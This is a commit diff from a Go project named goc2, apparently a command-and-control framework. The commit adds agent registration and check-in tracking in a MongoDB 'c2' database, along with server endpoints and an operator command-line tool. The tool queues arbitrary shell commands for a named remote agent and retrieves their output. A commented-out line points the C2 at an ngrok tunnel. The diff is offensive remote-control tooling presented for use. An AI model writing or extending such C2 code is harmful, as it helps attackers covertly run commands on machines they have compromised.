STRLCPY/goc2

updates
b.stegemoller committed 3 years ago

e6090b1d

1 parent ac82cdb1

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

cmd/goc2/goc2.go

		skipped 3 lines
4	4		"flag"
5	5		//"fmt"
6	6		//"os"
7		-	"goc2/web"
8	7		"goc2/pkg/cli"
	8	+	"goc2/web"
9	9		)
10	10
11	11		var (
12		-	cliPtr bool
13		-	webPtr bool
	12	+	cliPtr bool
	13	+	webPtr bool
	14	+	listPtr bool
	15	+	agentPtr string
	16	+	c2Ptr string
14	17		)
15	18
16	19		//Start RedMap
		skipped 1 lines
18	21		//flags
19	22		flag.BoolVar(&cliPtr, "cli", false, "run email check")
20	23		flag.BoolVar(&webPtr, "web", false, "Start Web Server")
	24	+	flag.BoolVar(&listPtr, "list", false, "List Connected Agents")
	25	+	flag.StringVar(&agentPtr, "agent", "", "Start Web Server")
	26	+	flag.StringVar(&c2Ptr, "c2", "", "connect to c2")
21	27		flag.Parse()
22	28
	29	+	if listPtr == true {
	30	+	cli.ListAgents(c2Ptr)
	31	+	}
	32	+
23	33		if webPtr == true {
24	34		web.Start()
25	35		}
26	36
27	37		if cliPtr == true {
28		-	cli.Start()
	38	+	cli.Start(agentPtr, c2Ptr)
29	39		}
30	40
31	41		}
		skipped 1 lines

■ ■ ■ ■ ■ ■

internal/app/api/agent.go

1	1		package api
2	2
3	3		import (
4		-	"RedMap/config"
5	4		"encoding/json"
6	5		"fmt"
7	6		"log"
		skipped 5 lines
13	12		)
14	13
15	14		type Agent struct {
16		-	ID bson.ObjectId `bson:"_id,omitempty"`
17		-	Name string
	15	+	ID bson.ObjectId `bson:"_id,omitempty"`
	16	+	Agent string
	17	+	Working string
	18	+	checkIn string
18	19		}
19	20
20	21		type Command struct {
		skipped 93 lines
114	115		return jsondat
115	116		}
116	117
	118	+	func GetAgent(agent string) []byte {
	119	+	//query := bson.M{}
	120	+
	121	+	session, err := mgo.Dial("127.0.0.1")
	122	+	if err != nil {
	123	+	panic(err)
	124	+	}
	125	+
	126	+	defer session.Close()
	127	+
	128	+	c := session.DB("c2").C("agents")
	129	+
	130	+	// Query All
	131	+	var results Agent
	132	+	err = c.Find(bson.M{"agent": agent}).One(&results)
	133	+
	134	+	if err != nil {
	135	+	panic(err)
	136	+	}
	137	+	fmt.Println("Results All: ", results.Working)
	138	+
	139	+	jsondat, err := json.Marshal(results)
	140	+	if err != nil {
	141	+	log.Fatal("Cannot encode to JSON ", err)
	142	+	}
	143	+
	144	+	return jsondat
	145	+	}
	146	+
117	147		//Update command read status
118	148		func UpdateCMDStatus(id string, output string) {
119	149		//_id, _ := primitive.ObjectIDFromHex(id)
		skipped 32 lines
152	182		c.Update(what, change)
153	183		}
154	184
155		-	//Update command read status
156		-	func NewCMD(cmd string) {
	185	+	//UpdateAgentStatus update agent last checkin and current working directory
	186	+	func UpdateAgentStatus(agent string, working string) {
	187	+	//_id, _ := primitive.ObjectIDFromHex(id)
	188	+	now := time.Now()
	189	+	fmt.Println("Updating")
	190	+	fmt.Println(agent)
	191	+	session, err := mgo.Dial("127.0.0.1")
	192	+	if err != nil {
	193	+	panic(err)
	194	+	}
	195	+	defer session.Close()
	196	+	c := session.DB("c2").C("agents")
	197	+	if err != nil {
	198	+	panic(err)
	199	+	}
	200	+	what := bson.M{"agent": agent}
	201	+	change := bson.M{"$set": bson.M{"working": working, "checkIn": now}}
	202	+	c.Update(what, change)
	203	+	}
	204	+
	205	+	//NewCMD command read status
	206	+	func NewCMD(cmd string, agent string) {
157	207		randid := shortuuid.New()
158	208		fmt.Println("sending command")
159	209		fmt.Println(cmd)
160		-	query := bson.M{"agent": "test", "cmdid": randid, "status": "0", "client_status": "0", "command": cmd, "timestamp": time.Now()}
161		-	session, err := mgo.Dial(config.Configuration.MongoEndpoint)
	210	+	query := bson.M{"agent": agent, "cmdid": randid, "status": "0", "client_status": "0", "command": cmd, "timestamp": time.Now()}
	211	+	session, err := mgo.Dial("127.0.0.1")
162	212		if err != nil {
163	213		panic(err)
164	214		}
		skipped 5 lines
170	220		}
171	221		}
172	222
	223	+	//NewCMD command read status
	224	+	func AgentCreate(agent string, wd string) {
	225	+	fmt.Println("creating agent")
	226	+	fmt.Println(agent)
	227	+	query := bson.M{"agent": agent, "working": wd, "checkIn": time.Now()}
	228	+	session, err := mgo.Dial("127.0.0.1")
	229	+	if err != nil {
	230	+	panic(err)
	231	+	}
	232	+	defer session.Close()
	233	+	c := session.DB("c2").C("agents")
	234	+	err = c.Insert(query)
	235	+	if err != nil {
	236	+	panic(err)
	237	+	}
	238	+	}
	239	+

■ ■ ■ ■ ■ ■

pkg/cli/cli.go

		skipped 12 lines
13	13		)
14	14
15	15		var timeoutSetting = 1
16		-	var c2 = "http://localhost:8005"
17		-	var agent = "test"
	16	+
	17	+	//var c2 = "https://e49a4a48f45d.ngrok.io"
	18	+	//var agent = "test"
18	19
19	20		//ok
20	21		type Cmd struct {
		skipped 5 lines
26	27		Output string
27	28		}
28	29
29		-	func Start() {
	30	+	type Agent struct {
	31	+	ID string
	32	+	Agent string
	33	+	Working string
	34	+	checkIn time.Time
	35	+	}
	36	+
	37	+	func ListAgents(c2 string) {
	38	+	getAgents(c2 + "/api/agents/")
	39	+	}
	40	+
	41	+	func getAgents(url string) {
	42	+
	43	+	resp, err := http.Get(url)
	44	+	if err != nil {
	45	+	panic(err)
	46	+	}
	47	+	if resp.Body != nil {
	48	+	defer resp.Body.Close()
	49	+	}
	50	+
	51	+	body, readErr := ioutil.ReadAll(resp.Body)
	52	+	if readErr != nil {
	53	+	log.Fatal(readErr)
	54	+	}
	55	+
	56	+	var results []Agent
	57	+	jsonErr := json.Unmarshal(body, &results)
	58	+	if jsonErr != nil {
	59	+	log.Fatal(jsonErr)
	60	+	}
	61	+
	62	+	for _, d := range results {
	63	+	fmt.Fprintln(os.Stderr, "Agent: "+d.Agent+"\tDir: "+d.Working+"\tSeen: "+d.checkIn.String()+"\n")
	64	+	}
	65	+	}
	66	+
	67	+	func Start(agent string, c2 string) {
30	68		reader := bufio.NewReader(os.Stdin)
31	69		timeout := time.Duration(timeoutSetting) * time.Second
32	70		ticker := time.NewTicker(timeout)
33	71		quit := make(chan struct{})
34	72		for {
35		-	fmt.Print("agent0012$ ")
	73	+	wd := getAgentWorking(c2 + "/api/agent/" + agent)
	74	+	fmt.Print(wd + "-" + agent + "$ ")
36	75		select {
37	76		case <-ticker.C:
38	77		cmdString, err := reader.ReadString('\n')
39	78		if err != nil {
40	79		fmt.Fprintln(os.Stderr, err)
41	80		}
42		-	err = sendCommand(cmdString)
	81	+	err = sendCommand(cmdString, agent, c2)
43	82		if err != nil {
44	83		fmt.Fprintln(os.Stderr, err)
45	84		}
46		-	deadline := time.Now().Add(10 * time.Second)
	85	+	deadline := time.Now().Add(5 * time.Second)
47	86		for {
48		-	data := getJSON(c2 + "/api/cmd/output/" + agent)
	87	+	data := getJSON(c2+"/api/cmd/output/"+agent, c2)
49	88		if data == "True" \|\| cmdString == "\n" {
50	89		break
51	90		}
52	91		if time.Now().After(deadline) {
53		-	fmt.Fprintln(os.Stderr, "Command Timed Out!")
	92	+	fmt.Fprintln(os.Stderr, "Wait")
54	93		break
55	94		}
56	95		}
		skipped 3 lines
60	99		}
61	100		}
62	101
63		-	func sendCommand(cmd string) error {
	102	+	func sendCommand(cmd string, agent string, c2 string) error {
64	103		resp, err := http.PostForm(c2+"/api/cmd/new",
65		-	url.Values{"cmd": {cmd}})
	104	+	url.Values{"cmd": {cmd}, "agent": {agent}})
66	105
67	106		if err != nil {
68	107		panic(err)
		skipped 4 lines
73	112		return nil
74	113		}
75	114
76		-	func getJSON(url string) string {
	115	+	func getJSON(url string, c2 string) string {
77	116
78	117		resp, err := http.Get(url)
79	118		if err != nil {
		skipped 18 lines
98	137		if len(d.Output) > 0 {
99	138		//fmt.Println(d.Output)
100	139		fmt.Fprintln(os.Stderr, d.Output)
101		-	updateCmdStatus(d.Cmdid)
	140	+	updateCmdStatus(d.Cmdid, c2)
102	141		return "True"
103	142		}
104	143		//fmt.Println(d.Cmdid + ": " + d.Output)
		skipped 5 lines
110	149		return "False"
111	150		}
112	151
113		-	func updateCmdStatus(cmdid string) {
	152	+	func getAgentWorking(url string) string {
	153	+
	154	+	resp, err := http.Get(url)
	155	+	if err != nil {
	156	+	fmt.Println(err)
	157	+	}
	158	+	if resp.Body != nil {
	159	+	defer resp.Body.Close()
	160	+	}
	161	+
	162	+	body, readErr := ioutil.ReadAll(resp.Body)
	163	+	if readErr != nil {
	164	+	log.Fatal(readErr)
	165	+	}
	166	+
	167	+	var results Agent
	168	+	jsonErr := json.Unmarshal(body, &results)
	169	+	if jsonErr != nil {
	170	+	log.Fatal(jsonErr)
	171	+	}
	172	+
	173	+	//fmt.Println(results.Working)
	174	+
	175	+	return results.Working
	176	+
	177	+	}
	178	+
	179	+	func updateCmdStatus(cmdid string, c2 string) {
114	180		resp, err := http.PostForm(c2+"/api/cmd/update/output",
115	181		url.Values{"id": {cmdid}, "client_status": {"1"}})
116	182
		skipped 8 lines

■ ■ ■ ■ ■ ■ ■

web/server.go

		skipped 35 lines
36	36
37	37		//Agents Endpoints
38	38		router.GET("/api/agents", apiAgents)
	39	+	router.GET("/api/agent/:agent", apiAgent)
	40	+	router.POST("/api/agent/update", apiAgentsUpdate)
	41	+	router.POST("/api/agent/create", apiAgentsCreate)
39	42		router.GET("/agents/", redirect)
40	43
41	44		//commands Endpoints
		skipped 36 lines
78	81		api.UpdateCMDStatus(ID, OUTPUT)
79	82		}
80	83
	84	+	func apiAgentsUpdate(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {
	85	+	w.Header().Set("Content-Type", "application/x-www-form-urlencoded")
	86	+	if err := r.ParseForm(); err != nil {
	87	+	fmt.Fprintf(w, "ParseForm() err: %v", err)
	88	+	return
	89	+	}
	90	+
	91	+	AGENT := r.FormValue("agent")
	92	+	WD := r.FormValue("working")
	93	+	fmt.Println(AGENT)
	94	+	fmt.Println(WD)
	95	+
	96	+	jsond := map[string]interface{}{
	97	+	"status": "Command Updated",
	98	+	}
	99	+
	100	+	jsondata, err := json.Marshal(jsond)
	101	+	if err != nil {
	102	+	log.Fatalln(err)
	103	+	}
	104	+	fmt.Fprintf(w, string(jsondata))
	105	+	api.UpdateAgentStatus(AGENT, WD)
	106	+	}
	107	+
	108	+	func apiAgentsCreate(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {
	109	+	w.Header().Set("Content-Type", "application/x-www-form-urlencoded")
	110	+	if err := r.ParseForm(); err != nil {
	111	+	fmt.Fprintf(w, "ParseForm() err: %v", err)
	112	+	return
	113	+	}
	114	+
	115	+	AGENT := r.FormValue("agent")
	116	+	WD := r.FormValue("working")
	117	+	fmt.Println(AGENT)
	118	+	fmt.Println(WD)
	119	+
	120	+	jsond := map[string]interface{}{
	121	+	"status": "Command Updated",
	122	+	}
	123	+
	124	+	jsondata, err := json.Marshal(jsond)
	125	+	if err != nil {
	126	+	log.Fatalln(err)
	127	+	}
	128	+	fmt.Fprintf(w, string(jsondata))
	129	+	api.AgentCreate(AGENT, WD)
	130	+	}
	131	+
81	132		func apiCmdUpdateOut(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {
82	133		w.Header().Set("Content-Type", "application/x-www-form-urlencoded")
83	134		if err := r.ParseForm(); err != nil {
		skipped 24 lines
108	159		}
109	160
110	161		CMD := r.FormValue("cmd")
	162	+	AGENT := r.FormValue("agent")
111	163		fmt.Println(CMD)
112	164
113	165		jsond := map[string]interface{}{
		skipped 5 lines
119	171		log.Fatalln(err)
120	172		}
121	173		fmt.Fprintf(w, string(jsondata))
122		-	api.NewCMD(CMD)
	174	+	api.NewCMD(CMD, AGENT)
123	175		}
124	176
125	177		func apiAgents(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {
		skipped 13 lines
139	191		func apiCmdsOut(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {
140	192		w.Header().Set("Content-Type", "application/json")
141	193		d := api.GetCommandsOut(ps.ByName("id"))
	194	+
	195	+	fmt.Fprintf(w, "%s", string(d))
	196	+	}
	197	+
	198	+	func apiAgent(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {
	199	+	w.Header().Set("Content-Type", "application/json")
	200	+	d := api.GetAgent(ps.ByName("agent"))
142	201
143	202		fmt.Fprintf(w, "%s", string(d))
144	203		}
		skipped 13 lines

updates